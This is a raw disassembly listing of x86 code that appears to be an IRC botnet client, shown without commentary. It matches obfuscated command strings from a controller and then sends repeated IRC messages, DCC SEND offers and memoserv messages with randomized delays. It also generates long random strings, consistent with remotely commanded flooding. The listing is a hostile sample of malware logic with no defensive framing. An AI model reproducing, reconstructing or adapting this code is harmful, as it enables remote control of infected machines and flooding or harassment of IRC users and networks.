call sub_42638E
add esp, 14h
loc_40DF0E: ; CODE XREF: sub_40A9FE+3455�j
; sub_40A9FE+345E�j
push dword ptr [ebx+4]
push offset aK9vUKkutm ; "K9V/U/KkuTM/"
call edi ; dword_437178
test eax, eax
jnz loc_40DFBC
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40DFBC
push eax
lea eax, [ebp+var_30AC]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_68], eax
jle short loc_40DF8D
loc_40DF4B: ; CODE XREF: sub_40A9FE+358D�j
mov eax, [ebp+arg_68]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40DF82
push eax
lea eax, [ebp+var_E840]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_E840]
push 100h
push eax
lea eax, [ebp+var_30AC]
push eax
call sub_4299E0
add esp, 18h
loc_40DF82: ; CODE XREF: sub_40A9FE+3555�j
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_4]
jl short loc_40DF4B
loc_40DF8D: ; CODE XREF: sub_40A9FE+354B�j
lea eax, [ebp+var_30AC]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
loc_40DFBC: ; CODE XREF: sub_40A9FE+351C�j
; sub_40A9FE+3527�j
push dword ptr [ebx+4]
push offset a7yfnz0pw11s1 ; "7yfnz0PW11s1"
call edi ; dword_437178
test eax, eax
jnz loc_40E06A
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40E06A
push eax
lea eax, [ebp+var_5ABC]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_68], eax
jle short loc_40E03B
loc_40DFF9: ; CODE XREF: sub_40A9FE+363B�j
mov eax, [ebp+arg_68]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40E030
push eax
lea eax, [ebp+var_E840]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_E840]
push 100h
push eax
lea eax, [ebp+var_5ABC]
push eax
call sub_4299E0
add esp, 18h
loc_40E030: ; CODE XREF: sub_40A9FE+3603�j
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_4]
jl short loc_40DFF9
loc_40E03B: ; CODE XREF: sub_40A9FE+35F9�j
lea eax, [ebp+var_5ABC]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aLcxMHdpwr1_0 ; "lCX/m/HdpWr1"
push offset dword_441058
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
loc_40E06A: ; CODE XREF: sub_40A9FE+35CA�j
; sub_40A9FE+35D5�j
push dword ptr [ebx+4]
push offset aNq_as1z1sit ; "nQ.As1Z1SIt/"
call edi ; dword_437178
test eax, eax
jnz short loc_40E0A8
mov ecx, [ebx+8]
test ecx, ecx
jz short loc_40E0A8
mov eax, [ebx+0Ch]
test eax, eax
jz short loc_40E0A8
push eax
push ecx
lea eax, [ebp+var_59BC]
push offset dword_441048
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
loc_40E0A8: ; CODE XREF: sub_40A9FE+3678�j
; sub_40A9FE+367F�j ...
push dword ptr [ebx+4]
push offset aUn3hk0sn58o_0 ; "uN3hk0sn58o/"
call edi ; dword_437178
test eax, eax
jnz short loc_40E117
mov ecx, [ebx+8]
test ecx, ecx
jz short loc_40E117
mov eax, [ebx+0Ch]
test eax, eax
jz short loc_40E0F0
push eax
push ecx
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset dword_441058
push eax
call sub_429B03
add esp, 14h
jmp short loc_40E10A
; ---------------------------------------------------------------------------
loc_40E0E1: ; CODE XREF: sub_40A9FE+2A43�j
; sub_40A9FE+2A4C�j ...
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
mov edi, offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
jmp loc_410B5A
; ---------------------------------------------------------------------------
loc_40E0F0: ; CODE XREF: sub_40A9FE+36C4�j
push ecx
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
add esp, 10h
loc_40E10A: ; CODE XREF: sub_40A9FE+36E1�j
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
pop ecx
loc_40E117: ; CODE XREF: sub_40A9FE+36B6�j
; sub_40A9FE+36BD�j
push dword ptr [ebx+4]
push offset aQrn4z10ge1i1_0 ; "QRn4z10ge1I1"
call edi ; dword_437178
test eax, eax
jnz short loc_40E152
mov eax, [ebx+8]
test eax, eax
jz short loc_40E152
push eax
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
loc_40E152: ; CODE XREF: sub_40A9FE+3725�j
; sub_40A9FE+372C�j
push dword ptr [ebx+4]
push offset aIegud0v_5_ ; "iEguD0V/.5/."
call edi ; dword_437178
test eax, eax
jnz short loc_40E195
mov ecx, [ebx+8]
test ecx, ecx
jz short loc_40E195
mov eax, [ebx+0Ch]
test eax, eax
jz short loc_40E195
push eax
push ecx
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
lea eax, [ebp+var_59BC]
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
loc_40E195: ; CODE XREF: sub_40A9FE+3760�j
; sub_40A9FE+3767�j ...
push dword ptr [ebx+4]
push offset aFc9kk1jx11g_ ; "fc9Kk1jX11G."
call edi ; dword_437178
test eax, eax
jnz short loc_40E202
cmp [ebx+8], eax
jz short loc_40E202
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
call sub_429B9C
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_1F54]
push edx
push dword ptr [ebx+8]
push offset dword_441040
push eax
call sub_429B03
lea eax, [ebp+var_1F54]
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 28h
loc_40E202: ; CODE XREF: sub_40A9FE+37A3�j
; sub_40A9FE+37A8�j
push dword ptr [ebx+4]
push offset aDnjq8Ze3zw ; "DnjQ8/ze3ZW/"
call edi ; dword_437178
test eax, eax
jnz loc_40E356
mov eax, [ebx+8]
test eax, eax
jz loc_40E356
cmp dword ptr [ebx+0Ch], 0
jz loc_40E356
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 2Ch
call sub_429B9C
cdq
mov ecx, 3E8h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
call sub_429B9C
cdq
mov ecx, 384h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 2Ch
call sub_429B9C
cdq
mov ecx, 0C8h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
loc_40E356: ; CODE XREF: sub_40A9FE+3810�j
; sub_40A9FE+381B�j ...
push dword ptr [ebx+4]
push offset aEwqxaOc1t_ ; "EWqxA//oC1T."
call edi ; dword_437178
test eax, eax
jnz loc_40E731
cmp [ebx+8], eax
jz loc_40E731
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
call sub_429B9C
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 41h
mov byte ptr [ebp+arg_68+3], dl
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
movsx eax, byte ptr [ebp+arg_68+3]
push edx
push eax
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 0Fh
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_220C0]
push edx
push offset dword_440F98
push eax
call sub_429B03
push 7D0h
push 400h
call sub_41E415
add esp, 0C4h
push eax
lea eax, [ebp+var_38050]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_440F5C
push eax
call sub_429B03
push 7D0h
push 400h
call sub_41E415
add esp, 1Ch
push eax
call sub_429B9C
cdq
mov ecx, 5F5E0FFh
idiv ecx
lea eax, [ebp+var_3CE70]
push edx
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_440F10
push eax
call sub_429B03
push 7D0h
push 400h
call sub_41E415
add esp, 20h
push eax
call sub_429B9C
cdq
mov ecx, 5F5E0FFh
idiv ecx
push edx
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
lea eax, [ebp+var_41C90]
push offset dword_440EE0
push eax
call sub_429B03
push 7D0h
push 400h
call sub_41E415
push eax
lea eax, [ebp+var_220C0]
push eax
lea eax, [ebp+var_46AB0]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_440EBC
push eax
call sub_429B03
add esp, 38h
call sub_426323
push eax
lea eax, [ebp+var_220C0]
push eax
call sub_426323
push eax
lea eax, [ebp+var_4B8D0]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset dword_440EA4
push eax
call sub_429B03
lea eax, [ebp+var_220C0]
push eax
lea eax, [ebp+var_506F0]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSDccSendCS ; "%s %s :DCC SEND C:\\\\\\\\%s"
push eax
call sub_429B03
lea eax, [ebp+var_38050]
push eax
call sub_42638E
lea eax, [ebp+var_3CE70]
push eax
call sub_42638E
lea eax, [ebp+var_41C90]
push eax
call sub_42638E
lea eax, [ebp+var_46AB0]
push eax
call sub_42638E
add esp, 40h
lea eax, [ebp+var_4B8D0]
push eax
call sub_42638E
lea eax, [ebp+var_506F0]
push eax
call sub_42638E
pop ecx
pop ecx
loc_40E731: ; CODE XREF: sub_40A9FE+3964�j
; sub_40A9FE+396D�j
push dword ptr [ebx+4]
push offset aJiatz0xsump1 ; "JIAtz0xSuMp1"
call edi ; dword_437178
test eax, eax
jnz loc_40E82E
cmp [ebx+8], eax
jz loc_40E82E
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
push 0Fh
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyz1234567890abc"...
pop ecx
lea edi, [ebp+var_768]
rep movsd
movsw
movsb
mov esi, 2710h
lea eax, [ebp+var_66680]
push esi
push 0
push eax
call sub_429760
push esi
lea eax, [ebp+var_35940]
push 0
push eax
call sub_429760
add esp, 1Ch
mov esi, 8Fh
loc_40E796: ; CODE XREF: sub_40A9FE+3DE6�j
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
call sub_429B9C
push 24h
cdq
pop ecx
idiv ecx
movsx eax, [ebp+edx+var_768]
push eax
push offset dword_440E84
lea eax, [ebp+var_66680]
push 2710h
push eax
call sub_429BBE
add esp, 14h
lea eax, [ebp+var_66680]
push eax
lea eax, [ebp+var_35940]
push eax
call dword_437090 ; lstrcatA
dec esi
jnz short loc_40E796
push 7D0h
push 400h
call sub_41E415
push eax
lea eax, [ebp+var_35940]
push eax
lea eax, [ebp+var_55510]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_440E5C
push eax
call sub_429B03
lea eax, [ebp+var_55510]
push eax
call sub_42638E
mov esi, [ebp+arg_C]
mov edi, dword_437178
add esp, 24h
loc_40E82E: ; CODE XREF: sub_40A9FE+3D3F�j
; sub_40A9FE+3D48�j
push dword ptr [ebx+4]
push offset aVi0qa1mvfro1 ; "VI0QA1mvfro1"
call edi ; dword_437178
test eax, eax
jnz loc_40E91A
cmp [ebx+8], eax
jz loc_40E91A
cmp [ebx+0Ch], eax
jz loc_40E91A
push 2710h
push eax
lea eax, [ebp+var_52E00]
push eax
call sub_429760
push 104h
lea eax, [ebp+var_2EA8]
push 0
push eax
call sub_429760
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_2EA8]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 24h
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_40E8DB
loc_40E899: ; CODE XREF: sub_40A9FE+3EDB�j
mov eax, [ebp+arg_C]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40E8D0
push eax
lea eax, [ebp+var_52E00]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_52E00]
push 104h
push eax
lea eax, [ebp+var_2EA8]
push eax
call sub_4299E0
add esp, 18h
loc_40E8D0: ; CODE XREF: sub_40A9FE+3EA3�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_40E899
loc_40E8DB: ; CODE XREF: sub_40A9FE+3E99�j
push 7D0h
push 400h
call sub_41E415
push eax
lea eax, [ebp+var_2EA8]
push eax
lea eax, [ebp+var_5A330]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_440E5C
push eax
call sub_429B03
lea eax, [ebp+var_5A330]
push eax
call sub_42638E
add esp, 24h
loc_40E91A: ; CODE XREF: sub_40A9FE+3E3C�j
; sub_40A9FE+3E45�j ...
push dword ptr [ebx+4]
push offset aW3gp6_13acy1 ; "W3GP6.13AcY1"
call edi ; dword_437178
test eax, eax
jnz short loc_40E960
lea eax, [ebp+var_21F8]
push eax
call sub_426761
lea eax, [ebp+var_21F8]
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
loc_40E960: ; CODE XREF: sub_40A9FE+3F28�j
push dword ptr [ebx+4]
push offset aE8qiq0hukv9 ; "e8qiq0Hukv9/"
call edi ; dword_437178
test eax, eax
jnz short loc_40E9D0
mov eax, [ebx+8]
test eax, eax
jz short loc_40E9D0
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
lea eax, [ebp+var_2268]
push eax
call sub_426761
lea eax, [ebp+var_2268]
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 2Ch
loc_40E9D0: ; CODE XREF: sub_40A9FE+3F6E�j
; sub_40A9FE+3F75�j
push dword ptr [ebx+4]
push offset a18rjk_sa2je ; "18Rjk.sa2JE/"
call edi ; dword_437178
test eax, eax
jnz loc_40EAA0
cmp [ebx+8], eax
jz loc_40EAA0
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40EAA0
and [ebp+arg_C], 0
push eax
call sub_42A100
test eax, eax
pop ecx
jle loc_40EAA0
loc_40EA09: ; CODE XREF: sub_40A9FE+409C�j
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
lea eax, [ebp+var_1F8C]
push eax
call sub_426761
lea eax, [ebp+var_1F8C]
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 40h
inc [ebp+arg_C]
push dword ptr [ebx+0Ch]
call sub_42A100
cmp [ebp+arg_C], eax
pop ecx
jl loc_40EA09
loc_40EAA0: ; CODE XREF: sub_40A9FE+3FDE�j
; sub_40A9FE+3FE7�j ...
push dword ptr [ebx+4]
push offset aLjAmKzrtp1 ; "lJ/am/kZRtP1"
call edi ; dword_437178
test eax, eax
jnz loc_40EB93
mov eax, [ebx+8]
test eax, eax
jz loc_40EB93
cmp dword ptr [ebx+0Ch], 0
jz loc_40EB93
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 2Ch
call sub_429B9C
cdq
mov ecx, 3E8h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
call sub_429B9C
cdq
mov ecx, 384h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
loc_40EB93: ; CODE XREF: sub_40A9FE+40AE�j
; sub_40A9FE+40B9�j ...
push dword ptr [ebx+4]
push offset aXzaru0amxhi_ ; "XZArU0aMxhi."
call edi ; dword_437178
test eax, eax
jnz loc_40EC7C
mov eax, [ebx+8]
test eax, eax
jz loc_40EC7C
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 2Ch
call sub_429B9C
cdq
mov ecx, 3E8h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
call sub_429B9C
cdq
mov ecx, 384h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
loc_40EC7C: ; CODE XREF: sub_40A9FE+41A1�j
; sub_40A9FE+41AC�j
push dword ptr [ebx+4]
push offset aRa7e2Hhxpf0 ; "rA7E2/hHXPf0"
call edi ; dword_437178
test eax, eax
jnz loc_40ED98
mov eax, [ebx+8]
test eax, eax
jz loc_40ED98
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441088
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 28h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441074
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441064
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441064
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 14h
loc_40ED98: ; CODE XREF: sub_40A9FE+428A�j
; sub_40A9FE+4295�j
push dword ptr [ebx+4]
push offset aRp4sr11cvr1 ; "Rp4sR11CvR1/"
call edi ; dword_437178
test eax, eax
jnz loc_40EEC7
mov eax, [ebx+8]
test eax, eax
jz loc_40EEC7
cmp dword ptr [ebx+0Ch], 0
jz loc_40EEC7
push eax
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset aSS_1 ; "%s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441088
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 28h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
call sub_429B9C
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_437190 ; Sleep
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
loc_40EEC7: ; CODE XREF: sub_40A9FE+43A6�j
; sub_40A9FE+43B1�j ...
push dword ptr [ebx+4]
push offset aZqrvt0t6nmz_ ; "ZqrVt0t6nmZ."
call edi ; dword_437178
test eax, eax
jnz loc_40EF75
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40EF75
push eax
lea eax, [ebp+var_32AC]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_40EF46
loc_40EF04: ; CODE XREF: sub_40A9FE+4546�j
mov eax, [ebp+arg_C]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40EF3B
push eax
lea eax, [ebp+var_E840]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_E840]
push 100h
push eax
lea eax, [ebp+var_32AC]
push eax
call sub_4299E0
add esp, 18h
loc_40EF3B: ; CODE XREF: sub_40A9FE+450E�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_40EF04
loc_40EF46: ; CODE XREF: sub_40A9FE+4504�j
lea eax, [ebp+var_32AC]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSMemoservSendS ; "%s memoserv :send %s %s"
push eax
call sub_429B03
lea eax, [ebp+var_59BC]
push eax
call sub_42638E
add esp, 18h
loc_40EF75: ; CODE XREF: sub_40A9FE+44D5�j
